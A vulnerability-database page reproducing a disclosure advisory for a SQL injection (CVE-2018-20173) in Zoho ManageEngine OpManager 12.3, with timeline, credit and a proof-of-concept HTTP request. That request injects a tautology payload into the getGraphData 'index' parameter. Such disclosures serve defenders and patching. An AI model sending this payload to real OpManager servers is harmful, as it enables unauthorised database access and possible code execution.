Vulners
Lucene search
Zoho ManageEngine OpManager 12.3 SQL Injection Vulnerability
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Zoho ManageEngine OpManager SQL Injection Vulnerability (CNVD-2019-24539) | 17 Dec 201800:00 | ā | cnvd |
 | Zoho ManageEngine OpManager SQL Injection (CVE-2018-20173) | 21 Feb 201900:00 | ā | checkpoint_advisories |
 | CVE-2018-20173 | 17 Dec 201808:00 | ā | cve |
 | CVE-2018-20173 | 17 Dec 201808:00 | ā | cvelist |
 | ManageEngine OpManager 12.3 SQL Injection | 8 Jan 201900:00 | ā | dsquare |
 | CVE-2018-20173 | 17 Dec 201808:29 | ā | nvd |
 | CVE-2018-20173 | 17 Dec 201808:29 | ā | osv |
 | Zoho ManageEngine OpManager 12.3 SQL Injection | 17 Dec 201800:00 | ā | packetstorm |
 | Sql injection | 17 Dec 201808:29 | ā | prion |
 | CVE-2018-20173 | 22 May 202508:01 | ā | redhatcve |
10
I. VULNERABILITY
-------------------------
Zoho ManageEngine OpManager 12.3 before 123238 allows SQL injection
via the getGraphData API.
II. CVE REFERENCE
-------------------------
CVE-2018-20173
III. VENDOR
-------------------------
https://www.manageengine.com
IV. TIMELINE
-------------------------
20/11/18 Vulnerability discovered
20/11/18 Vendor contacted
17/12/2018 OPManager replay that they fixed
V. CREDIT
-------------------------
Murat Aydemir from Biznet Bilisim A.S.
VI. DESCRIPTION
-------------------------
ManageEngine OPManager product(version 12.3) was vulnerable to SQL
Injection attacks. A successfully exploit of this attack could allow
arbitrary code execution or unauthenticated access in databases
information.
References: https://www.manageengine.com/network-monitoring/help/read-me.html
https://bugbounty.zoho.com/bb/info#hof
VII. PoC
-------------------------
GET /api/json/v2/device/getGraphData?name=192.168.252.150&policyName=WMI-MemoryUtilization&index=WMI-MemoryUtilization10376381'%20or%20'11'%3d'11&period=Today&withMMA=true&apiKey=XXXXXXXXXX&_=1539935355622
HTTP/1.1
Host: vulnerablehost.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://vulnerablehost.com/apiclient/ember/index.jsp
OPMCurrentRoute:
http%3A%2F%2F192.168.252.150%3A8061%2Fapiclient%2Fember%2Findex.jsp%23%2FInventory%2FSnapshot%2FMonitoringDevice%2F192.168.252.150%2FPerfGraph%2FWMI-MemoryUtilization%2FWMI-MemoryUtilization
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=XXXXXXXXXXX; encryptPassForAutomaticSignin=XXXXXXX;
userNameForAutomaticSignin=admin;
domainNameForAutomaticSignin=Authenticator; signInAutomatically=true;
authrule_name=Authenticator; NFA__SSO=XXXXXXXXX;
opmcsrfcookie=XXXXXXXXX
DNT: 1
Connection: close
--
# 0day.today [2018-12-18] #Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Dec 2018 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.24498